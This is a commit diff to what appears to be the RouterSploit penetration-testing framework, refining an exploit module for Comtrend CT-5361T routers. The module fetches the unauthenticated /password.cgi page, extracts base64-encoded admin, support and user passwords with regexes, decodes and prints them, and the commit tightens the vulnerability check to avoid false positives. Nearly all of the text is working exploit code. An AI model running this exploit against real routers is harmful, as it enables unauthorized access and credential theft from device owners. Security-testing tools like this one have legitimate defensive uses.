Fixing false positive for asmax ar 1004g devices.

af188ee4 · Marcin Bury · 42342469 · af188ee4
Commit af188ee4 authored Apr 30, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 25 additions and 13 deletions

ct_5361t_password_disclosure.py ...modules/exploits/comtrend/ct_5361t_password_disclosure.py +25 -13

No files found.
--- a/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
+++ b/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
@@ -38,26 +38,24 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
+        if self.check():
            url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
-
            print_status("Requesting for {}".format(url))

            response = http_request(method="GET", url=url)
            if response is None:
                return

-        creds = []
-        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
-        if len(admin):
-            creds.append(('Admin', b64decode(admin[0])))
+            regexps = [("admin", "pwdAdmin = '(.+?)'"),
+                       ("support", "pwdSupport = '(.+?)'"),
+                       ("user", "pwdUser = '(.+?)'")]

-        support = re.findall("pwdSupport = '(.+?)'", response.text)
-        if len(support):
-            creds.append(('Support', b64decode(support[0])))
+            creds = []
+            for regexp in regexps:
+                res = re.findall(regexp[1], response.text)

-        user = re.findall("pwdUser = '(.+?)'", response.text)
-        if len(user):
-            creds.append(('User', b64decode(user[0])))
+                if len(res):
+                    creds.append((regexp[0], b64decode(res[0])))

            if len(creds):
                print_success("Credentials found!")
@@ -66,6 +64,8 @@ class Exploit(exploits.Exploit):
                print("NOTE: Admin is commonly implemented as root")
            else:
                print_error("Credentials could not be found")
+        else:
+            print_error("Device seems to be not vulnerable")

    @mute
    def check(self):
@@ -75,7 +75,19 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable

-        if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
-            return True  # target vulnerable
+        regexps = ["pwdAdmin = '(.+?)'",
+                   "pwdSupport = '(.+?)'",
+                   "pwdUser = '(.+?)'"]

+        for regexp in regexps:
+            res = re.findall(regexp, response.text)
+
+            if len(res):
+                try:
+                    b64decode(res[0])  # checking if data is base64 encoded
+                except:
+                    return False  # target is not vulnerable
+            else:
                return False  # target is not vulnerable
+
+        return True  # target is vulnerable